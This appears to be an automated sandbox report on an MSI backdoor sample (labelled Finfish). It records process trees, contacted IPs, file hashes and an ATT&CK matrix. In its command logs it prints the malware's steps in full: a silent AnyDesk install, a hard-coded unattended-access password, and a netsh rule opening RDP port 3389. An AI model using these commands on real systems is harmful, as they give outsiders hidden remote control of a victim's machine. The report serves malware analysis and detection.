Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe "c:\programdata\anydesk\anydesk.exe" --get-id
Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk.exe c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\anydesk\AnyDesk.exe c:\programdata\anydesk\anydesk.exe --set-password
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\VSSVC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\ProgramData\anydesk\AnyDesk.exeCode function: 20_2_016F9BE0 _vswprintf_s,WaitForSingleObject,OutputDebugStringA,GetSystemTime,TlsGetValue,__itow,GetCurrentThreadId,GetCurrentProcessId,__snprintf,SetFilePointer,SetFilePointer,ReadFile,_memmove,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,WriteFile,RtlEnterCriticalSection,RaiseException,

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow (2 identical entries)
Source: install.exe, 0000000B.00000003.1118766580.0000000000946000.00000004.00000020.00020000.00000000.sdmp, install.exe, 0000000B.00000003.1118897172.000000000095E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: procdump.exe
Source: AnyDesk.exe, 00000014.00000002.1170344791.0000000001E7A000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: release/win_7.0.x
Source: AnyDesk.exe, 00000014.00000002.1170344791.0000000001E7A000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: .itext.text.customf97bed53183a234c33acc24231b422c4release/win_7.0.x96f8d80eac273a9144abccce2f66dbc2200cc81d
Source: anydesk.exe, 00000010.00000002.1077981622.0000000001BA0000.00000040.00000001.01000000.00000008.sdmp | Binary or memory string: 96f8d80eac273a9144abccce2f66dbc2200cc81drelease/win_7.0.xf97bed53183a234c33acc24231b422c4
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
1
Replication Through Removable Media
1
Native API
1
LSASS Driver
1
LSASS Driver
211
Disable or Modify Tools
1
Input Capture
1
System Time Discovery
1
Replication Through Removable Media
1
Archive Collected Data
Exfiltration Over Other Network Medium1
Ingress Tool Transfer
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Command and Scripting Interpreter
1
Image File Execution Options Injection
1
Image File Execution Options Injection
1
Obfuscated Files or Information
LSASS Memory11
Peripheral Device Discovery
Remote Desktop Protocol1
Input Capture
Exfiltration Over Bluetooth12
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)2
Windows Service
1
Access Token Manipulation
11
Software Packing
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Standard Port
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)1
Registry Run Keys / Startup Folder
2
Windows Service
1
File Deletion
NTDS14
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer1
Non-Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCron1
Services File Permissions Weakness
11
Process Injection
21
Masquerading
LSA Secrets131
Security Software Discovery
SSHKeyloggingData Transfer Size Limits2
Application Layer Protocol
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.common1
Registry Run Keys / Startup Folder
41
Virtualization/Sandbox Evasion
Cached Domain Credentials1
Process Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup Items1
Services File Permissions Weakness
1
Access Token Manipulation
DCSync41
Virtualization/Sandbox Evasion
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
Process Injection
Proc Filesystem1
Application Window Discovery
Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
Hidden Files and Directories
/etc/passwd and /etc/shadow1
Remote System Discovery
Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
Hidden Users
Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
Services File Permissions Weakness
Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Behavior Graph ID: 679413 | Sample: 1.msi | Startdate: 05/08/2022 | Architecture: WINDOWS | Score: 100
Top-level signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file
Process tree recovered from the behavior graph (graph node ids in parentheses; the rendered graph itself is not reproduced):
  msiexec.exe (9) started; contacts 192.168.2.3; drops C:\Windows\Installer\78c344.msi (Composite), C:\Windows\Installer\78c341.msi (Composite), C:\Windows\Installer\MSIED31.tmp (PE32) and 3 other files (none is malicious)
    msiexec.exe (20) started
      install.exe (24) started; contacts 80.209.241.3 (ports 20000, 49178; HOSTKEY-USAUS, United States); drops C:\programdata\anydesk.exe (PE32); signatures: Creates an undocumented autostart registry key; Hides user accounts; Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall
        cmd.exe (37) started
          anydesk.exe (45) started; drops C:\ProgramData\anydesk\AnyDesk.exe (PE32); signatures: Detected unpacking (changes PE section rights); Hides that the sample has been downloaded from the Internet (zone.identifier)
        cmd.exe (39) started
          AnyDesk.exe (49) started
          cmd.exe (51) started
        netsh.exe (41) started
        AnyDesk.exe (43) started
      expand.exe (29) started; drops C:\Users\user\AppData\...\install.exe (copy) (PE32) and C:\...\eee52229ee24a34cb61191d27a7b66f1.tmp (PE32)
      icacls.exe (31) started
      icacls.exe (33) started
    msiexec.exe (22) started
      cmd.exe (35) started
  AnyDesk.exe (13) started; contacts boot.net.anydesk.com 92.223.88.41 (ports 49176, 80; GCOREAT, Austria), 195.181.174.167 (ports 443, 49175; CDN77GB, United Kingdom), 195.181.174.174 (ports 49177, 6568; CDN77GB, United Kingdom); signature: Detected unpacking (changes PE section rights)
  AnyDesk.exe (16) started
  7 other processes (18) started

Source | Detection | Scanner | Label | Link
1.msi | 48% | Virustotal | | Browse
1.msi | 30% | ReversingLabs | Win32.Backdoor.Finfish |
1.msi | 100% | Avira | BDS/Finfish.ujrxw |
Source | Detection | Scanner | Label | Link
C:\Windows\Installer\78c344.msi | 100% | Avira | BDS/Finfish.ujrxw |
C:\Windows\Installer\78c341.msi | 100% | Avira | BDS/Finfish.ujrxw |
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp | 100% | Joe Sandbox ML | |
C:\ProgramData\anydesk\AnyDesk.exe | 0% | Virustotal | | Browse
C:\ProgramData\anydesk\AnyDesk.exe | 3% | Metadefender | | Browse
C:\ProgramData\anydesk\AnyDesk.exe | 2% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp | 64% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp | 22% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp | 65% | ReversingLabs | Win32.Backdoor.Finfish |
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy) | 64% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy) | 22% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy) | 65% | ReversingLabs | Win32.Backdoor.Finfish |
C:\Windows\Installer\MSI5BE8.tmp | 0% | Virustotal | | Browse
C:\Windows\Installer\MSI5BE8.tmp | 0% | Metadefender | | Browse
C:\Windows\Installer\MSI5BE8.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIB0A0.tmp | 0% | Virustotal | | Browse
C:\Windows\Installer\MSIB0A0.tmp | 0% | Metadefender | | Browse
C:\Windows\Installer\MSIB0A0.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIBA33.tmp | 0% | Metadefender | | Browse
C:\Windows\Installer\MSIBA33.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIED31.tmp | 0% | Metadefender | | Browse
C:\Windows\Installer\MSIED31.tmp | 0% | ReversingLabs | |
Source | Detection | Scanner | Label | Link | Download
11.0.install.exe.400000.4.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.0.install.exe.400000.1.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.0.install.exe.400000.7.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.0.install.exe.400000.3.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.0.install.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.0.install.exe.400000.5.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.0.install.exe.400000.2.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.2.install.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
11.0.install.exe.400000.6.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalid | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
boot.net.anydesk.com | 92.223.88.41 | true | false | | high
                                                                    high
                                                                    http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvalueanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1041519952.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://help.anydesk.com/shareanydesk.exe, 00000010.00000002.1069670165.0000000001640000.00000002.00000001.01000000.00000008.sdmp, anydesk.exe, 00000010.00000003.1033845137.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://my.anydesk.com/password-generator.AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.anydesk.comAnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                            high
                                                                            https://help.anydesk.com/AnyDesk.exe, 00000014.00000002.1169793889.00000000018A0000.00000002.00000001.01000000.0000000A.sdmp, AnyDesk.exe, 00000014.00000003.1051455757.00000000010C0000.00000004.00000800.00020000.00000000.sdmp, AnyDesk.exe, 00000014.00000003.1050069306.00000000006C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
92.223.88.41 | boot.net.anydesk.com | Austria | 199524 | GCOREAT | false
195.181.174.174 | unknown | United Kingdom | 60068 | CDN77GB | false
80.209.241.3 | unknown | United States | 395839 | HOSTKEY-USAUS | false
195.181.174.167 | unknown | United Kingdom | 60068 | CDN77GB | false
                                                                              IP
                                                                              192.168.2.3
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 679413
Start date and time: 2022-08-05 18:21:10 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 50s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 1.msi
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 30
Number of new started drivers analysed: 4
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.winMSI@34/28@4/5
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 100% (good quality ratio 83.3%)
• Quality average: 57.3%
• Quality standard deviation: 31.2%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .msi
• Adjust boot time
• Enable AMSI
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information.
• Report size exceeded the maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtFsControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Time | Type | Description
18:22:14 | API Interceptor | 3181x Sleep call for process: msiexec.exe modified
18:22:16 | API Interceptor | 959x Sleep call for process: VSSVC.exe modified
18:22:16 | API Interceptor | 896x Sleep call for process: svchost.exe modified
18:23:06 | API Interceptor | 2x Sleep call for process: icacls.exe modified
18:23:15 | API Interceptor | 206x Sleep call for process: install.exe modified
18:23:23 | API Interceptor | 99x Sleep call for process: anydesk.exe modified
18:23:28 | API Interceptor | 277x Sleep call for process: AnyDesk.exe modified
18:23:59 | API Interceptor | 3x Sleep call for process: netsh.exe modified
                                                                              No context
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7322
                                                                              Entropy (8bit):5.5670592053751085
                                                                              Encrypted:false
                                                                              SSDEEP:96:89EuAeuAD8tekIQBUwVPVfbCsAqGxUwVPVfbC6j2PBOuA5AqGSHLuAlv5qZW9MNz:8euZuLev6tfm86tfmuuUumk+uNdEpW
                                                                              MD5:B7025B12AA3BE2CAE5DEF3833655E219
                                                                              SHA1:102FA7B4C4260D9D5BD7C30281BD08001BEEB23C
                                                                              SHA-256:7B29024A6914C3B956525901EF818DABF62C9C89B6368612547024862E7BF148
                                                                              SHA-512:5C72611C364608962962D2ECF12D7A1B4673BD25D7A8427A2E8898ACE59B1E34D613098E807F772833DB86F5A1786EF0D86F96AE7C1F4E226A1844AFB312B0B7
                                                                              Malicious:false
                                                                              Preview:...@IXOS.@.....@`..U.@.....@.....@.....@.....@.....@......&.{AC4583F8-6694-473E-BB77-32CDFC9BA940}F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..1.msi.@.....@.....@.....@........&.{8CB27BF3-59BC-4419-BE15-E9E385453F27}.....@.....@.....@.....@.......@.....@.....@.......@....F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}&.{AC4583F8-6694-473E-BB77-32CDFC9BA940}.@........bz.LateInstallFinish1....bz.LateInstallFinish2....WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....1.SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\AnyDesk...@....(.&...LogonUser..user'.&...USERNAME..Peter Miller'.&...Date..8/5/2022'.&...Time..19:02:58'.&...WRAPPED_ARGUMENTS....RegisterProduct..Registering product..[1]......C:\Windows\Installer\78c
                                                                              Process:C:\ProgramData\anydesk.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3829888
                                                                              Entropy (8bit):7.999053982852042
                                                                              Encrypted:true
                                                                              SSDEEP:98304:nDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3H:n7svcsImkN4chYECl3
                                                                              MD5:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              SHA1:78C9302C7A387A8D158F38D501784BE9B8B2716D
                                                                              SHA-256:AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6
                                                                              SHA-512:7113888A8439AE5AF1B260C40229F7EBB98BDECE52EBAB0CE97137933AF4E9777D92D68166DBCF87A95CF88615452CAE7ECDF555B4785FFFE63C5783DBCB595D
                                                                              Malicious:true
                                                                              Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 3%
                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........h.}.;.}.;.}.;..";.}.;..#;.}.;...;.}.;...;.}.;Rich.}.;........................PE..L.....1b.........."......*....:..^...........@....@...................................:...@..........................................p..PH...........4:..<...........................................................................................text...5(.......*.................. ..`.itext...^...@...........................rdata..............................@..@.data.....9.......9..2..............@....rsrc...PH...p...J....9.............@..@.reloc...............0:.............@..B................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              File Type:ASCII text, with very long lines
                                                                              Category:dropped
                                                                              Size (bytes):2898
                                                                              Entropy (8bit):6.03920180688192
                                                                              Encrypted:false
                                                                              SSDEEP:48:uISTiIhiUqIhAIH/ARw+Pi+2ZeFL8GjZnHA5OFh31vtd9CgtiFjRcFmKBI45:uIST/iUx1/AJPi2FNpAwFjP9TtccFFd5
                                                                              MD5:D78C36C1B2DF59D1D7A19E89218822A8
                                                                              SHA1:9D14F9FE8AF7BDF5EB25F7BEA366E4C7C6DB8389
                                                                              SHA-256:1932C23AE6AB035EF6AB0E224EF58638AF13DFD12C53A2BC13E7A281CFE51717
                                                                              SHA-512:974080C66AA8AD073450A3A44F97FA48FAB8F872BEEBE0CC25801E2D66ADF6BF184B9C6D1D80A9C3941EC991496D327393228A0A902D65AD0D4B7B55EA3F3801
                                                                              Malicious:false
                                                                              Preview:ad.anynet.cert=-----BEGIN CERTIFICATE-----\nMIICqDCCAZACAQEwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UEAwwOQW55RGVzayBD\nbGllbnQwIBcNMjIwODA2MDEyMzMwWhgPMjA3MjA3MjQwMTIzMzBaMBkxFzAVBgNV\nBAMMDkFueURlc2sgQ2xpZW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC\nAQEA3m9s0Xt1t6ybpCuW6GUgR24wf33iMQUiJAkO3evQMW3zyFFXrNZcRj0gHy6w\nBL21EgWWFj2otf99+2oj08znVPz3mdvxzGSw/UoyvVxy/gmtRT3WsMxcAvfd9EDV\nyAPwLRcp3mII7ngo1WZi0jDp0gWsbbDtdTXnNjJeTSKgLhh0VUIhYG4GpCPYcCzF\nzLUb+u1d6dYRj1r2nIhLHJ5a8Z2KcGlYtWvpin/OcMSw154LmU+WpLriSvk2acpu\nxpVJ65OTluRkbl4jmxjseMDXhK9cRLjPEHYCcERRJO+JsAO0h7oMEA8kb0YDQTz4\nxnIGxSU5NbzP5mXYU3Db0+7DyQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQBgKZcB\ndwulkUuSK1r+HxcUkJlxVhs2UJvxaDaj7xsNFiH8+U+ljppHLIPE/OGC/ENBjrQm\n8FMlI3kBnZh751nIsaYK5LoPXOFz9wTesecg7kQzYsFJOmwdg9pTMT8gIh9kzU3W\n3SQH6kvGz7EPfSRxl1JjzVLqbI5xGCtOi4WFl3Y0upNHz8wVAdHt9+ReuYH1cC0t\nCAIjwdr26SmLy9XCcwcx6NsGf1FWYG4kURtaU/vJaqb+HDWZXICa11e2msyfIq1m\n4dGSYqDD+LTLd61V16rRBlY747w2QTxgc47coAPCaRhaKMWOY9oYWWHTaP6MJZVi\nLolPxJ9cTEJ8dHHY\n-----END CERTI
                                                                              Process:C:\ProgramData\anydesk.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):664
                                                                              Entropy (8bit):4.694299449856687
                                                                              Encrypted:false
                                                                              SSDEEP:12:oUrQM3uqQHvWhOLroBGgFBGgItgw/T5hgnx7b0wlcpv:dF37AwetBVBTPC7bJlSv
                                                                              MD5:49B7C6D323D2E373B0CEAEB28B4BBDC5
                                                                              SHA1:0E5D4E26427190E07495FCC5FBFE46A20C07FCAA
                                                                              SHA-256:4E120EA4CAECD70BF796C634FA2278FAF0BA5424406D1AA367957210B666644A
                                                                              SHA-512:BC5EF736EC71E6940422240523978D6B918B5747AE30437188757458DDA415B02FB9CD61B208C59C5B89991D0557E4BEE4FE6ABB61BBBC3D63C0A5C733326571
                                                                              Malicious:false
                                                                              Preview:ad.anynet.fpr=ad8fec6ce2ea9587309c50b97175d8ed639a9f09.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=0.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles._unattended_access.pwd=29a3bbba8f6029c5e4ab4fe97081df7dfcfd6458966ad8df64e9a620697bfd59.ad.security.permission_profiles._unattended_access.salt=a3a4ac0604db119fa69085484617bf37.ad.security.permission_profiles.version=1.ad.security.update_channel=stable.ad.security.update_type=0.
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3048
                                                                              Entropy (8bit):3.694456222285318
                                                                              Encrypted:false
                                                                              SSDEEP:48:2QzaN38RN3x0/7wP8aZntCwL7feGp9bHfOIgbR1fOIgBKEBKRC6v6ReyZ:2QzI4uU/vfHzbOHXOHB9BpiW
                                                                              MD5:5F246453E47299A07D8C949665C8A0FE
                                                                              SHA1:5B341BA26C94F782A34C5523FAC302B7BCD3411A
                                                                              SHA-256:2EA3134921D1CD1F5E95079CE163D36DE1351A6361410967016DC69F0291F419
                                                                              SHA-512:DE72396CF4181BAC60E006E18A83519A9B3DF6E56FFACAAEDF9308CD8C4717B9E520DCACEE735803663DB6F661C5E5E04647B1443B73CFA474307AFC75C0CA28
                                                                              Malicious:false
                                                                              Preview:.D.....M..,....c.Pc<.......................^..E.X.<m...8.......@..5...........M..0.<fK...; ...............................$.......8...Q.......Q...I.n.s.t.a.l.l.e.d. .A.n.y.d.e.s.k. .-. .U.N.R.E.G.I.S.T.E.R.E.D. .-. .W.r.a.p.p.e.d. .u.s.i.n.g. .M.S.I. .W.r.a.p.p.e.r. .f.r.o.m. .w.w.w...e.x.e.m.s.i...c.o.m.................C.:.\.W.i.n.d.o.w.s.\...............1.7.9.6.0.5.................W.O.R.K.G.R.O.U.P.......Zi.A.@.H..i.tE<.....................).(?..P............. ...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\...............C.:.\...........N).A.j..j...............(...0.......,...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\.......4...............(.C.:.).........<...@...D...H...L...P...T...X...\...`...d...h...l...p...t...x...|.......%.......%...A.d.o.b.e. .A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C. .1.9...0.1.0...2.0.0.9.8.....).......)...A.d.o.b.e. .F.l.a.s.h. .P.l.
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:SysEx File - Twister
                                                                              Category:dropped
                                                                              Size (bytes):8734472
                                                                              Entropy (8bit):3.681659655459525
                                                                              Encrypted:false
                                                                              SSDEEP:12288:+8+YgDYEzT4G09wYKc9rMjG/BWigr7dCKV0/HwLQt+Y/g4zsuAvm7gPI+PhgcIrd:d0jYY8BWitXZh7TeQsPIy1YQza
                                                                              MD5:9CC465911CDBD0BFC8D7BFC74ECCE88B
                                                                              SHA1:867E1C21ADBC08A0BC12B1ED50F59EB3A78EC23F
                                                                              SHA-256:BA671D105C6C5A76B5B2D369E12887BCF3C729CFCF34F222A6DB2D4FF3AA666E
                                                                              SHA-512:04D495AC9EBEDC50F9FF325912A19A31B00A54EB0FA99830FBB6B1CBFB1847A21447BE699FE42AD45F80842E1D672F44FAEA0C38519CFEFAB4C86547106CDCF0
                                                                              Malicious:false
                                                                              Preview:.%..=..J.....>.(_kb..............F...................... ...Y.......Y...<.B.A.C.K.U.P._.C.O.M.P.O.N.E.N.T.S. .x.m.l.n.s.=.".x.-.s.c.h.e.m.a.:.#.V.s.s.C.o.m.p.o.n.e.n.t.M.e.t.a.d.a.t.a.". .v.e.r.s.i.o.n.=.".1...2.". .b.o.o.t.a.b.l.e.S.y.s.t.e.m.S.t.a.t.e.B.a.c.k.u.p.=.".y.e.s.". .s.e.l.e.c.t.C.o.m.p.o.n.e.n.t.s.=.".y.e.s.". .b.a.c.k.u.p.T.y.p.e.=.".f.u.l.l.". .p.a.r.t.i.a.l.F.i.l.e.S.u.p.p.o.r.t.=.".y.e.s.". .s.n.a.p.s.h.o.t.S.e.t.I.d.=.".1.3.f.3.8.0.d.2.-.c.9.5.e.-.4.5.d.3.-.8.b.5.8.-.c.e.3.c.6.d.9.c.c.4.c.1.".>.<.W.R.I.T.E.R._.C.O.M.P.O.N.E.N.T.S. .i.n.s.t.a.n.c.e.I.d.=.".4.5.8.b.f.6.d.0.-.9.8.7.c.-.4.5.2.7.-.b.7.b.9.-.5.d.4.0.5.2.4.a.2.1.2.4.". .w.r.i.t.e.r.I.d.=.".e.8.1.3.2.9.7.5.-.6.f.9.3.-.4.4.6.4.-.a.5.3.e.-.1.0.5.0.2.5.3.a.e.2.2.0.". .b.a.c.k.u.p.S.c.h.e.m.a.=.".0.".>.<.C.O.M.P.O.N.E.N.T. .c.o.m.p.o.n.e.n.t.N.a.m.e.=.".S.y.s.t.e.m. .F.i.l.e.s.". .c.o.m.p.o.n.e.n.t.T.y.p.e.=.".f.i.l.e.g.r.o.u.p."./.>.<./.W.R.I.T.E.R._.C.O.M.P.O.N.E.N.T.S.>.<.W.R.I.T.E.R._.C.O.M.P.O.N.E.N.T.S. .i.
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3048
                                                                              Entropy (8bit):3.694456222285318
                                                                              Encrypted:false
